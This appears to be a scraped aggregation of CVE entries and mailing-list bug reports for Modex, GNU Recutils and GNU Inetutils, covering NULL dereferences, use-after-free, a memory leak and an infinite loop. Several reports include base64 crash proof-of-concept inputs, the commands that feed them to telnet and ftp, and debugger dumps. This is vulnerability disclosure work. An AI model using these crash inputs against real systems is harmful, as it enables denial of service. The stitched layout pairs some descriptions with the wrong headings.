     ► f 0   0x55555556aa8f set_create_id+60
       f 1   0x55555556b0ce handle_pthread_create+20
       f 2   0x55555556cc32 modex_recur+4535
       f 3   0x55555556ee66 modex_node+266
       f 4   0x55555557050c modex_any+85
       f 5   0x55555556f98c modex_node+3120
       f 6   0x55555557050c modex_any+85
       f 7   0x55555556f894 modex_node+2872
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x000055555556aa8f in set_create_id () at xtract.c:3797
    #1  0x000055555556b0ce in handle_pthread_create (which=0) at xtract.c:3966
    #2  0x000055555556cc32 in modex_recur (root=0x7ffff7b6e3d8) at xtract.c:4425
    #3  0x000055555556ee66 in modex_node (node=0x7ffff7b6e3d8, tabs=2) at xtract.c:5197
    #4  0x000055555557050c in modex_any (child=0x7ffff7b6e3d8, tabs=2) at xtract.c:5746
    #5  0x000055555556f98c in modex_node (node=0x7ffff7b6e658, tabs=2) at xtract.c:5505
    #6  0x000055555557050c in modex_any (child=0x7ffff7b6e658, tabs=2) at xtract.c:5746
    #7  0x000055555556f894 in modex_node (node=0x7ffff7b6e6f8, tabs=2) at xtract.c:5484
    #8  0x000055555557050c in modex_any (child=0x7ffff7b6e6f8, tabs=2) at xtract.c:5746
    #9  0x000055555556f8af in modex_node (node=0x7ffff7b6e108, tabs=2) at xtract.c:5485
    #10 0x000055555557050c in modex_any (child=0x7ffff7b6e108, tabs=2) at xtract.c:5746
    #11 0x0000555555570357 in modex_for (forn=0x7ffff7b6e1f8, tabs=1) at xtract.c:5701
    #12 0x0000555555570545 in modex_any (child=0x7ffff7b6e1f8, tabs=1) at xtract.c:5756
    #13 0x000055555556f98c in modex_node (node=0x7ffff7b6e6a8, tabs=1) at xtract.c:5505
    #14 0x000055555557050c in modex_any (child=0x7ffff7b6e6a8, tabs=1) at xtract.c:5746
    #15 0x0000555555570b19 in modex_tree (root=0x7ffff7b6e6a8, lut=0x55555558d215 "none.lut") at xtract.c:5852
    #16 0x000055555555f962 in main (argc=2, argv=0x7fffffffe0f8) at modex.c:1337
    #17 0x00007ffff7c980b3 in __libc_start_main (main=0x55555555f510 <main>, argc=2, argv=0x7fffffffe0f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe0e8) at ../csu/libc-start.c:308
    #18 0x00005555555585ee in _start ()
    

**fix**

Should we add some code here to handle it?

If there is no `&`，get the substring from the 1st '(' to the 1st ',' in OutBuf.

void
set\_create\_id(void)	// from the 1st '&(' to the 1st '),' in OutBuf or from the 1st '(' to the 1st ',' in OutBuf
{	char \*s, \*e;

	join\_id = 0;
	s = strchr(OutBuf, '&');
	if (s != NULL)
	{	e = strchr(s+1, ')');
	}
	else
	{
		s = strchr(OutBuf, '(')-1;
		e = strchr(s+1, ',');
	}
	if (!e || e-s <= 1) { return; }

	join\_id = (char \*) e\_malloc((e-s) \* sizeof(char));
	strncpy(join\_id, s+2, (e-s)-1\-1);
}

CVE-2021-46171: NULL Pointer Dereference in set_create_id() · Issue #8 · nimble-code/Modex

An untrusted pointer dereference in rec_db_destroy() at rec-db.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.

CVE-2021-46019: Untrusted Pointer Dereference in rec_db_destroy()

An Use-After-Free vulnerability in rec_mset_elem_destroy() at rec-mset.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.

CVE-2021-46022: Use After Free in in rec_mset_elem_destroy() at rec-mset.c:83

GNU Inetutils commit cf091 was discovered to contain a memory leak via the ifconfig function.

\# Memory leak in ifconfig

\## Description

Memory leak in ifconfig

\*\*version\*\*

\`\`\`  
./ifconfig --version  
ifconfig (GNU inetutils) 2.2.16-cf091  
Copyright (C) 2021 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html\>.  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law.

Written by Marcus Brinkmann.  
\`\`\`

\*\*System information\*\*  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

\*\*Result\*\*

\`\`\`  
./ifconfig  
docker0   Link encap:Ethernet  HWaddr 02:42:0F:3F:D1:8C  
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1  
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0  
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0  
          collisions:0 txqueuelen:0  
          RX bytes:0  TX bytes:0

ens160    Link encap:Ethernet  HWaddr 00:0C:29:E5:38:0E  
          inet addr:192.168.155.5  Bcast:192.168.155.255  Mask:255.255.254.0  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1  
          RX packets:7327 errors:0 dropped:0 overruns:0 frame:0  
          TX packets:6372 errors:0 dropped:0 overruns:0 carrier:0  
          collisions:0 txqueuelen:1000  
          RX bytes:844586  TX bytes:2386960

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0  
          UP LOOPBACK RUNNING  MTU:65536  Metric:1  
          RX packets:3092 errors:0 dropped:0 overruns:0 frame:0  
          TX packets:3092 errors:0 dropped:0 overruns:0 carrier:0  
          collisions:0 txqueuelen:1000  
          RX bytes:1598123  TX bytes:1598123

\=================================================================  
\==7524==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 64 byte(s) in 1 object(s) allocated from:  
    #0 0x494bdd in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/ifconfig+0x494bdd)  
    #1 0x4e0330 in linux\_if\_nameindex /root/disk2/fuzzing/inetutils/inetutils/ifconfig/./system/linux.c:948:11  
    #2 0x4cbfd5 in parse\_cmdline /root/disk2/fuzzing/inetutils/inetutils/ifconfig/options.c:678:22  
    #3 0x4c432c in main /root/disk2/fuzzing/inetutils/inetutils/ifconfig/ifconfig.c:56:3

SUMMARY: AddressSanitizer: 64 byte(s) leaked in 1 allocation(s).  
\`\`\`

CVE-2021-45780: Memory leak in ifconfig

A NULL pointer dereference in unsetcmd() at inetutils/telnet/commands.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.

\[Date Prev\]\[Date Next\]\[Thread Prev\]\[Thread Next\]\[Date Index\]\[Thread Index\]

**From**:

AiDai

**Subject**:

\[bug #61726\] NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

**Date**:

Thu, 23 Dec 2021 09:14:18 -0500 (EST)

**User-agent**:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

URL:
  <https://savannah.gnu.org/bugs/?61726\>

                 Summary: NULL Pointer Dereference in unsetcmd() at
inetutils/telnet/commands.c:1227
                 Project: GNU Networking Utilities
            Submitted by: aidai
            Submitted on: Thu 23 Dec 2021 02:14:16 PM UTC
                Category: None
                Severity: 3 - Normal
              Item Group: None
                  Status: None
                 Privacy: Public
             Assigned to: None
             Open/Closed: Open
         Discussion Lock: Any

    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Details:

# NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

## Description

A NULL Pointer Dereference was discovered in unsetcmd() at
inetutils/telnet/commands.c:1227. The vulnerability causes a segmentation
fault and application crash.

\*\*version\*\*

\`\`\`
./telnet --version
telnet (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html\>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
\`\`\`

\*\*System information\*\*
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

\*\*poc\*\*

\`\`\`
base64 poc
dQsiIA==
\`\`\`

\*\*command:\*\*

\`\`\`
./telnet < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./telnet < ./poc
\[3\]    2387443 segmentation fault  ./telnet < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
1227              \*(ct->charp) = \_POSIX\_VDISABLE;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[
REGISTERS
\]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x55555557bee2 (line+2) ◂— 0x20 /\* ' ' \*/
 RCX  0xfbad2098
 RDX  0x0
 RDI  0x55555557ab20 (Setlist+128) —▸ 0x555555571a7d ◂—
0x67756265640020 /\* ' ' \*/
 RSI  0x555555571a7d ◂— 0x67756265640020 /\* ' ' \*/
 R8   0x55555557bee0 (line) ◂— 0x200075 /\* 'u' \*/
 R9   0x7c
 R10  0x555555572e4c ◂— 0x69626d413f00203e /\* '> ' \*/
 R11  0x246
 R12  0x555555559d20 (\_start) ◂— endbr64
 R13  0x7fffffffe210 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0
 RSP  0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
 RIP  0x55555555b592 (unsetcmd+717) ◂— mov    byte ptr \[rax\], 0
──────────────────────────────────────────────\[
DISASM
\]──────────────────────────────────────────────
 ► 0x55555555b592 <unsetcmd+717>    mov    byte ptr \[rax\], 0
   0x55555555b595 <unsetcmd+720>    mov    rax, qword ptr \[rbp - 0x20\]
   0x55555555b599 <unsetcmd+724>    mov    rax, qword ptr \[rax + 0x18\]
   0x55555555b59d <unsetcmd+728>    movzx  eax, byte ptr \[rax\]
   0x55555555b5a0 <unsetcmd+731>    movzx  eax, al
   0x55555555b5a3 <unsetcmd+734>    mov    edi, eax
   0x55555555b5a5 <unsetcmd+736>    call   control                <control>

   0x55555555b5aa <unsetcmd+741>    mov    rdx, rax
   0x55555555b5ad <unsetcmd+744>    mov    rax, qword ptr \[rbp - 0x20\]
   0x55555555b5b1 <unsetcmd+748>    mov    rax, qword ptr \[rax\]
   0x55555555b5b4 <unsetcmd+751>    mov    rsi, rax
──────────────────────────────────────────\[
SOURCE (CODE)
\]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/telnet/commands.c
   1222           (\*ct->handler) (0);
   1223           printf ("%s reset to \\"%s\\".\\n", ct->name, (char \*)
ct->charp);
   1224         }
   1225       else
   1226         {
 ► 1227           \*(ct->charp) = \_POSIX\_VDISABLE;
   1228           printf ("%s character is '%s'.\\n", ct->name,
   1229                   control (\*(ct->charp)));
   1230         }
   1231     }
   1232   return 1;
──────────────────────────────────────────────\[
STACK
\]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
01:0008│     0x7fffffffe038 ◂— 0x5555d867
02:0010│     0x7fffffffe040 —▸ 0x55555557ab20 (Setlist+128) —▸
0x555555571a7d ◂— 0x67756265640020 /\* ' ' \*/
03:0018│     0x7fffffffe048 —▸ 0x55555557bee0 (line) ◂— 0x200075 /\*
'u' \*/
04:0020│     0x7fffffffe050 ◂— 0x0
05:0028│     0x7fffffffe058 —▸ 0x55555557b360 (cmdtab+256) —▸
0x555555572e2f ◂— 0x6f74007465736e75 /\* 'unset' \*/
06:0030│ rbp 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120
◂— 0x0
07:0038│     0x7fffffffe068 —▸ 0x55555555dab9 (command+550) ◂— test 
 eax, eax
────────────────────────────────────────────\[
BACKTRACE
\]─────────────────────────────────────────────
 ► f 0   0x55555555b592 unsetcmd+717
   f 1   0x55555555dab9 command+550
   f 2   0x55555555e3c8 main+776
   f 3   0x7ffff7db50b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
#1  0x000055555555dab9 in command (top=1, tbuf=0x0, cnt=0) at commands.c:3044
#2  0x000055555555e3c8 in main (argc=0, argv=0x7fffffffe220) at main.c:423
#3  0x00007ffff7db50b3 in \_\_libc\_start\_main (main=0x55555555e0c0 <main>,
argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>,
rtld\_fini=<optimized out>, stack\_end=0x7fffffffe208) at
../csu/libc-start.c:308
#4  0x0000555555559d4e in \_start ()
\`\`\`






    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Reply to this item at:

  <https://savannah.gnu.org/bugs/?61726\>

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
  Message sent via Savannah
  https://savannah.gnu.org/

\[Prev in Thread\]

**Current Thread**

\[Next in Thread\]

*   **\[bug #61726\] NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227**, _AiDai_ **<=**

*   Prev by Date: **\[bug #61725\] NULL Pointer Dereference in help() at inetutils/telnet/commands.c:3094**
*   Next by Date: **Infinite Loop in domacro at domacro.c:258**
*   Previous by thread: **\[bug #61725\] NULL Pointer Dereference in help() at inetutils/telnet/commands.c:3094**
*   Next by thread: **Infinite Loop in domacro at domacro.c:258**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2021-45779: [bug #61726] NULL Pointer Dereference in unsetcmd() at inetutils/telnet/

A NULL pointer dereference in setnmap() at cmds.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.

\[Date Prev\]\[Date Next\]\[Thread Prev\]\[Thread Next\]\[Date Index\]\[Thread Index\]

**From**:

AiDai

**Subject**:

\[bug #61723\] NULL Pointer Dereference in setnmap() at cmds.c:2303

**Date**:

Thu, 23 Dec 2021 09:13:10 -0500 (EST)

**User-agent**:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

URL:
  <https://savannah.gnu.org/bugs/?61723\>

                 Summary: NULL Pointer Dereference in setnmap() at cmds.c:2303
                 Project: GNU Networking Utilities
            Submitted by: aidai
            Submitted on: Thu 23 Dec 2021 02:13:08 PM UTC
                Category: None
                Severity: 3 - Normal
              Item Group: None
                  Status: None
                 Privacy: Public
             Assigned to: None
             Open/Closed: Open
         Discussion Lock: Any

    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Details:

# NULL Pointer Dereference in setnmap() at cmds.c:2303

## Description

A NULL Pointer Dereference was discovered in setnmap() at cmds.c:2303. The
vulnerability causes a segmentation fault and application crash.

\*\*version\*\*

\`\`\`
./ftp --version
ftp (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html\>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
\`\`\`

\*\*System information\*\*
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

\*\*poc\*\*

\`\`\`
base64 poc
bm1hIBjyAoHzCcvLArnD/sreCvgmMwoKAPUKEBoKEAAKDgAAAIDn5+fn5wAABADn5+foA+f4FJ0r
CgoKCgoK538Kubn/gAArCgp/CgoKCgoKQn8K1rn/gAAKCgp/CgoKAN0=
\`\`\`

\*\*command:\*\*

\`\`\`
./ftp < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./ftp < ./poc
\[1\]    728662 segmentation fault  ./ftp < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at
cmds.c:2303
2303      \*cp = '\\0';
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[
REGISTERS
\]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x5555555702c0 (\_\_libc\_csu\_init) ◂— endbr64
 RCX  0x4
 RDX  0x0
 RDI  0x555555582aa0 ◂— 0x8102f21820616d6e
 RSI  0x20
 R8   0x555555583620 ◂— 0x8102f21800616d6e /\* 'nma' \*/
 R9   0x7ffff7f5a010 (main\_arena+1168) —▸ 0x7ffff7f5a000 (main\_arena+1152)
—▸ 0x7ffff7f59ff0 (main\_arena+1136) —▸ 0x7ffff7f59fe0
(main\_arena+1120) —▸ 0x7ffff7f59fd0 (main\_arena+1104) ◂— ...
 R10  0x555555580010 ◂— 0x0
 R11  0x7ffff7f59be0 (main\_arena+96) —▸ 0x5555555851a0 ◂— 0x0
 R12  0x555555559f30 (\_start) ◂— endbr64
 R13  0x7fffffffe210 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120 ◂— 0x0
 RSP  0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸ 0x555555583620
◂— 0x8102f21800616d6e /\* 'nma' \*/
 RIP  0x55555555ec9d (setnmap+258) ◂— mov    byte ptr \[rax\], 0
──────────────────────────────────────────────\[
DISASM
\]──────────────────────────────────────────────
 ► 0x55555555ec9d <setnmap+258>    mov    byte ptr \[rax\], 0
   0x55555555eca0 <setnmap+261>    mov    rax, qword ptr \[rip + 0x1ae49\]
<0x555555579af0>
   0x55555555eca7 <setnmap+268>    mov    rdi, rax
   0x55555555ecaa <setnmap+271>    call   rpl\_free                <rpl\_free>

   0x55555555ecaf <setnmap+276>    mov    rax, qword ptr \[rip + 0x1f98a\]
<0x55555557e640>
   0x55555555ecb6 <setnmap+283>    mov    rdi, rax
   0x55555555ecb9 <setnmap+286>    call   strdup@plt               
<strdup@plt>

   0x55555555ecbe <setnmap+291>    mov    qword ptr \[rip + 0x1ae2b\], rax
<0x555555579af0>
   0x55555555ecc5 <setnmap+298>    jmp    setnmap+301               
<setnmap+301>

   0x55555555ecc7 <setnmap+300>    nop
   0x55555555ecc8 <setnmap+301>    add    qword ptr \[rbp - 8\], 1
──────────────────────────────────────────\[
SOURCE (CODE)
\]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/cmds.c
   2298       while (\*++cp == ' ')
   2299         continue;
   2300       altarg = cp;
   2301       cp = strchr (altarg, ' ');
   2302     }
 ► 2303   \*cp = '\\0';
   2304
   2305   free (mapin);
   2306   mapin = strdup (altarg);
   2307
   2308   while (\*++cp == ' ')
──────────────────────────────────────────────\[
STACK
\]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸
0x555555583620 ◂— 0x8102f21800616d6e /\* 'nma' \*/
01:0008│     0x7fffffffe048 ◂— 0x355583620
02:0010│     0x7fffffffe050 —▸ 0x5555555796c0 (cmdtab+2464) ◂— 0x0
03:0018│     0x7fffffffe058 ◂— 0x0
04:0020│ rbp 0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120
◂— 0x0
05:0028│     0x7fffffffe068 —▸ 0x555555566a09 (cmdscanner+633) ◂—
mov    eax, dword ptr \[rip + 0x17bf5\]
06:0030│     0x7fffffffe070 ◂— 0x0
07:0038│     0x7fffffffe078 ◂— 0x1c54c7100
────────────────────────────────────────────\[
BACKTRACE
\]─────────────────────────────────────────────
 ► f 0   0x55555555ec9d setnmap+258
   f 1   0x555555566a09 cmdscanner+633
   f 2   0x55555556665a main+929
   f 3   0x7ffff7d950b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at
cmds.c:2303
#1  0x0000555555566a09 in cmdscanner (top=1) at main.c:461
#2  0x000055555556665a in main (argc=0, argv=0x7fffffffe220) at main.c:310
#3  0x00007ffff7d950b3 in \_\_libc\_start\_main (main=0x5555555662b9 <main>,
argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>,
rtld\_fini=<optimized out>, stack\_end=0x7fffffffe208) at
../csu/libc-start.c:308
#4  0x0000555555559f5e in \_start ()
\`\`\`






    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Reply to this item at:

  <https://savannah.gnu.org/bugs/?61723\>

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
  Message sent via Savannah
  https://savannah.gnu.org/

\[Prev in Thread\]

**Current Thread**

\[Next in Thread\]

*   **\[bug #61723\] NULL Pointer Dereference in setnmap() at cmds.c:2303**, _AiDai_ **<=**

*   Prev by Date: **\[bug #61722\] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186**
*   Next by Date: **\[bug #61724\] Infinite Loop in domacro at domacro.c:258**
*   Previous by thread: **\[bug #61722\] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186**
*   Next by thread: **\[bug #61724\] Infinite Loop in domacro at domacro.c:258**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2021-45778: [bug #61723] NULL Pointer Dereference in setnmap() at cmds.c:2303

GNU Inetutils 2.2.16-cf091 was discovered to contain an infinite loop in domacro at domacro.c.

CVE-2021-45775: [bug #61724] Infinite Loop in domacro at domacro.c:258

An Use-After-Free vulnerability in rec_record_destroy() at rec-record.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.

Tag

#ubuntu